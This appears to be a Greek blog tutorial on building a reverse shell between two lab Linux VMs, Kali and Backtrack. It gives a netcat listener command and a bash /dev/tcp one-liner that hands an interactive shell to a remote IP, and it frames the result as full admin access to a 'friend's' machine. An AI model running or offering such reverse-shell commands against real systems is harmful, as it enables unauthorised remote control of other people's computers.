Οδηγός για Reverse Shell μεταξύ δύο μηχανημάτων Linux

Σε αυτόν τον οδηγό πρόκειται να σας δείξουμε πώς να φτιάξετε ένα reverse shell ανάμεσα σε δύο μηχανήματα Linux.

Για τον σκοπό αυτόν θα χρησιμοποιούμε δύο VM που τρέχουν linux, το ένα θα είναι το Kali Linux και το άλλο θα είναι το Backtrack Linux.

  • Για Kali Linux Machine IP – 192.168.179.137
  • Για Backtrack Linux Machine IP – 192.168.179.139

Τι είναι το Reverse Shell

Συνήθως όταν πραγματοποιείτε οποιαδήποτε σύνδεση TCP / IP μεταξύ δύο υπολογιστών, τότε ένας διακομιστής (server) χειρίζεται τη σύνδεση και ένας άλλος ο λεγόμενος πελάτης (client) προσπαθεί να πραγματοποιήσει τη σύνδεση.

Πού μπορείτε να χρησιμοποιήσετε το Reverse Shell

Απλώς σκεφτείτε ότι θέλετε να βοηθήσετε έναν φίλο, αλλά δεν διαθέτει διακομιστή (server) με port forward (προώθηση πόρτας) κλπ και φυσικά να μην μπορείτε να συνδεθείτε στο μηχάνημά του. Σε αυτήν την περίπτωση μπορείτε να χρησιμοποιήσετε το Reverse Shell, ώστε να λάβετε με reverse TCP / IP μία σύνδεση στο μηχάνημα του φίλου σας ,με πλήρη πρόσβαση διαχειριστή.

  Εγκατάσταση και ρύθμιση OpenSSH στο Kali Linux

Μην σκέφτεστε παράνομα, δεν θέλω ζαβολιές ?

Τώρα πρόκειται να χρησιμοποιήσουμε το Netcat από την πλευρά του διακομιστή, δηλαδή στο BT Machine. Το Netcat είναι ένα δωρεάν βοηθητικό πρόγραμμα δικτύου, που χρησιμοποιείται για ανάγνωση / εγγραφή για TCP και UDP sockets.

Βήμα 1: Το πρώτο σας βήμα είναι να θέσετε το μηχάνημά σας σε λειτουργία listening με τη βοήθεια της ακόλουθης εντολής:

Εντολή: nc -l -vv -p 1337

Εδώ, -l σημαίνει λειτουργία listening, -vv σημαίνει λειτουργία verbose και -p μας δείχνει τη θύρα που χρησιμοποιείται για τον διακομιστή.

Μόλις τρέξετε την εντολή στο μηχάνημά σας (BT), θα πρέπει να σας εμφανίσει το παρακάτω:

Βήμα 2: Τώρα πηγαίνετε στο μηχάνημα του client, δηλαδή στο Kali Linux Machine που θέλετε να ελέγξετε από το τερματικό σας. Εδώ πρόκειται να ανακατευθύνουμε το τυπικό i / o / e του bash client στον διακομιστή με τη βοήθεια της εντολής bash:

Εντολή: bash -i &> /dev/tcp/192.168.179.139/1337 0> & 1

Εδώ το bash -i μας δείχνει ότι το Interactive bash, &> / dev / tcp / <IP> / <PORT> stand ανακατευθύνει την τυπική έξοδο και το σφάλμα του bash στον διακομιστή, καθώς και ότι 0> & 1 σημαίνει σύνδεση της τυπικής εισόδου του bash με την έξοδο.

  Antergos ISO Refresh 2016.11.20 το εύκολο Arch Linux

Εδώ και τα δύο μηχανήματα συνδέονται στο ίδιο δίκτυο μέσω της λειτουργίας NAT, οπότε θα χρησιμοποιήσουμε την τοπική μας IP.

Μόλις εσείς ή ο φίλος σας εκτελέσετε την παραπάνω εντολή στο μηχάνημα σας, θα συνδεθείτε με αυτό και θα μπορείτε να το ελέγχετε πλήρως, μέσω του shell τερματικού.


Καλή επιτυχία.

Ακολουθήσετε μας στο Google News iGuRu.gr at Google news

Written by Anastasis Vasileiadis

Οι μεταφράσεις είναι σαν τις γυναίκες. Όταν είναι ωραίες δεν είναι πιστές και όταν είναι πιστές δεν είναι ωραίες.

Αφήστε μια απάντηση

Η ηλ. διεύθυνση σας δεν δημοσιεύεται.

Το μήνυμα σας δεν θα δημοσιευτεί εάν:
1. Περιέχει υβριστικά, συκοφαντικά, ρατσιστικά, προσβλητικά ή ανάρμοστα σχόλια.
2. Προκαλεί βλάβη σε ανηλίκους.
3. Παρενοχλεί την ιδιωτική ζωή και τα ατομικά και κοινωνικά δικαιώματα άλλων χρηστών.
4. Διαφημίζει προϊόντα ή υπηρεσίες ή διαδικτυακούς τόπους .
5. Περιέχει προσωπικές πληροφορίες (διεύθυνση, τηλέφωνο κλπ).


66  +    =  75